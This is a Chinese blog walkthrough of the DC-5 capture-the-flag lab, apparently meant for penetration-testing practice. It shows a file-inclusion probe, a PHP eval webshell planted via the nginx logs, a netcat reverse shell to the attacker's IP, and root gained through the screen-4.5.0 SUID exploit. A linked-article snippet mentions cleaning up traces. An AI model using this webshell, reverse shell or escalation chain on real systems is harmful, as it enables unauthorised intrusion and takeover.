靶机 DC-5

最新推荐文章于 2022-11-19 20:41:48 发布
最新推荐文章于 2022-11-19 20:41:48 发布
阅读量138 收藏
点赞数
分类专栏: DC系列靶场 文章标签: linux 运维 服务器 https 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/126984870
版权

环境准备

DC-5靶机链接:百度网盘 请输入提取码

提取码:07cm

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机 arp-scan -l

2.探测目标靶机开放端口和服务情况

nmap -p- -A -sV 192.168.166.134

探测到nginx服务1.6.2

漏洞利用

1.发现留言页面,可以利用http://192.168.166.134/contact.php

点击Submit提交,发现url处有

filename=abc&lastname=abcd&country=australia&subject=abcd

多次点击提交出现Copyright © 2019,一直在变化,网页还是php?firstname= 类型

应该是文件包含漏洞

2.直接拼接路径探测敏感目录把

http://192.168.166.134/thankyou.php?file=../../../../etc/passwd

3.burp抓包上传木马 send发送执行

<?php @eval($_POST['cmd'])?>

4.发送的内容日志记录

nginx服务器的日志会记录在/var/log/nginx/error.log

查看位置

5.登录蚁剑

6.kali开启监听
nc -nlvp 4444

蚁剑反弹

nc 192.168.166.131 444 -e /bin/bash

权限提升

1.python 反弹交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

2.用find查看suid是否有可执行的文件,发现screen-4.5.0

3.searchsploit查找该命令漏洞:searchsploit screen 4.5.0

也可以用searchsploit -m 41154.sh 来保存到当前目录

4.复制框内代码,写入libhax.c和rootshell.c,执行编译

gcc编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c

5.构造dc5.sh脚本,第一行加入#!/bin/bash,最后一行加上:set ff=unix命令将原本的dos格式换行符变为unix格式。(输入#!/bin/bash 后点回车输入:wq!保存)

6.使用蚁剑将这三个文件传到目标主机当中去 (tmp目录下)

然后给dc-5.sh加上执行的权限并运行,在蚁剑里运行不能提权。

7.在之前反弹成功的界面里运行就行。

切换到/root根目录找到flag,成功拿下!!!

总结

(1)nginx日志文件/var/log/nginx/error.log var/log/nginx/access.log

默认配置文件是/etc/nginx/nginx.conf

(2)查看suid是否有可执行的文件

#查看suid是否有可执行的文件
find / –perm /4000 –print 2>/dev/null
#找特殊执行权限的文件,将错误输出到/dev/null下,/dev/null相当于linux中无底的垃圾桶
 
#查看suid文件夹
find / -perm -u=s -type f 2>/dev/null

(3)searchsploit -m 41154.sh 来保存到当前目录

searchsploit -p 41154.sh   查看文件位置

魏钦6666
关注
专栏目录
DC5-靶机
Au
08-29 2199
下载地址 作者已经做了一个提示视频,地址 配置的环境: kali:192.168.25.131 DC5-靶机 和 kali 在同一C段 渗透 nmap扫描网段,发现存活主机 nmap -sP 192.168.25.0/24 发现主机192.168.25.135,判定为DC3-靶机,继续使用nmap获取详细信息 nmap -A -p 1...
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-5靶机
m0_62094846的博客
07-01 379
ifconfig查找主机IP扫一波内网,探测下存活主机nmap 192.168.61.0/24使用nmap工具对DC-5靶机扫描开放的端口nmap -A -T4 192.168.61.133 -p- -oN nmap133.A(中途IP改成了192.168.61.134)开放了80,111,39542打开显示的IP地址 在concat界面把信息填写,就会跳转页面,是GET传参 反复刷新会发现时间有变化,猜测页面存在文件包含(?)然后用burp爆破页面(御剑扫不出来)一共7个 footer可以看到这个,确认这
DC5靶机
qq_40646572的博客
05-04 357
信息收集 开启dc5靶机。 先使用nmap扫描网段,发现dc5靶机,192.168.85.132.该靶机开启了 80端口以及111端口。 使用nmap未曾识别出端口服务。 web服务攻击 打开80服务的http服务。 大致看了下web服务的各项功能,发现concat页面中存在数据交互。 多次进行数据提交后,发现提交后的页面下面的Copyright ©数字一直在变动,怀疑此处有问题。 先尝试将存在参数交互的地方,尝试下sql注入。使用sqlmap跑一下,发现没有不存在注入点。 同时,扫描下目录。
vulnhub之DC5靶机
LainWith的博客
08-15 622
靶机概览信息收集nmap信息收集网站信息收集探测漏洞目录探测文件包含渗透攻击找出日志服务器一句话木马提权反弹shell交互式shell辅助工具提取手工执行脚本拿flag 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-5,314/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC5的M.
067 渗透测试实战,靶机 DC-5
鸡蛋炒鸡蛋
05-27 1446
文章目录一:环境准备二:nmap扫描三:御剑扫描网站 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1 需要抓包软件bp,文件的下载安装可以参考我的 前面的内容 :047 Burp Suite的详细安装与使用 打开DC-5,建议把虚拟机升级到15.5.7,我之前的虚拟机做这个dc靶机实验的时候经常电脑蓝屏。   二:nmap扫描 扫描局域网主机号 nmap -sP 192.168.100.0/24 -oN nmap.sP 扫描端口号 nmap
靶机DC-1 11111
最新发布
09-25
靶机DC-1 11111
vulnhub靶机DC-1
cyzCc的博客
02-15 976
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
靶机实战-DC-6
滕财然的博客
03-03 819
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
[渗透测试篇]Vulnhub之靶机DC-2
qq_43668710的博客
05-11 702
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
DC系列靶机渗透之DC-5
weixin_52515588的博客
06-10 694
确定DC-5 IP地址如上图所示 利用nmap查看开放的端口利用80端口访问,我们发现在contact下面有一个留言板功能。那么,我们就利用这个入口进行渗透。 我们利用xss漏洞验证来进行检测,发现没有任何反应,但是我们提交之后发现底部的内容会改变。接下来,我们利用工具来扫描以下这个网站的敏感文件和目录。就需要用到dirsearch在使用之前记得下载。 扫描完成如上图所示。 我们把每个页面访问一下,知道了footer.php就是有问题的页面,每刷新一次都会改变。 而根据之前存储信息得到的信息可知,这个页面
DC-5靶机渗透
m0_62008601的博客
05-21 671
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
DC-5靶机实战
0XAXSDD的博客
06-12 597
DC-5靶机实战 vm打开靶机,nat模式,kali主机发现,全扫描 发现开放了http服务。和rpcbind 2-4 用msf利用了一下辅助模块扫了一下rpcbing 没反应 转向web,打开是一个这样的网站 寻找api接口,看有没有可利用的,让我注意到contact这个页面 提交之前是 提交之后是 然后御剑扫描路径发现 这个页面很有趣。刷新一下,里面就会变 这里可以联想到,contact文件肯定包含了这个页面的文件,fuzz一下参数 file参数成功打开文件包含的入口 然后通过前面的端口服务扫
DC系列5靶机实战
qq_43462485的博客
10-28 654
DC-5靶机实战 攻击机:kali 192.168.43.16 目标机:dc-5 192.168.43.251 一、信息收集 1.使用kali自带的arp-scan -l进行同网段主机发现,然后使用nmap进行端口扫描 2.发现开放80端口的web服务,溜了一圈没找到什么信息,还是参考了一下大佬的思路 发现提交contact信息后每次刷新thank you的界面下面的数值都会变化,第一次遇到这种类型 参考大佬后发现可能是LFI(本地文件包含)漏洞 3.通过burp抓包,对参数进行
DC系列(5)DC-5靶机渗透
Nikris的博客
01-12 1124
DC-5
【渗透项目】靶机DC-5渗透过程
命运的旋律的博客
04-17 580
信息收集 主机发现 nmap -sn 192.168.189.0/24 网站指纹 whatweb 192.168.189.134 端口扫描 nmap -sV -O -T4 -p- -Pn -sT 192.168.189.134 --script vuln 目录扫描 dirb http://192.168.189.134 /usr/share/dirb/wordlists/com...
Vulnhub DC-5靶场
weixin_47019868的博客
11-19 827
Vulnhub DC-5靶场
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1761
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
DC-5靶场渗透】
一纸荒芜的博客
07-04 1685
DC-5 靶场
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值